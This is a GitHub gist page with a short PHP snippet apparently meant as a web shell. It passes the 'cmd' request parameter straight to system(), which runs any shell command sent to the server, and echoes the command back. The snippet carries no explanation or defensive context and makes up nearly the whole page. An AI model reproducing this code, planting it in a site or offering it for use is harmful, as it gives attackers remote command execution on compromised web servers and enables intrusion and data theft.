Skip to content

Instantly share code, notes, and snippets.

@leveled
Created October 19, 2016 00:50
Show Gist options
  • Save leveled/14b9136082e154e57a008a583672229f to your computer and use it in GitHub Desktop.
Save leveled/14b9136082e154e57a008a583672229f to your computer and use it in GitHub Desktop.
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST["cmd"]);
system($cmd);
echo "</pre>$cmd<pre>";
die;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment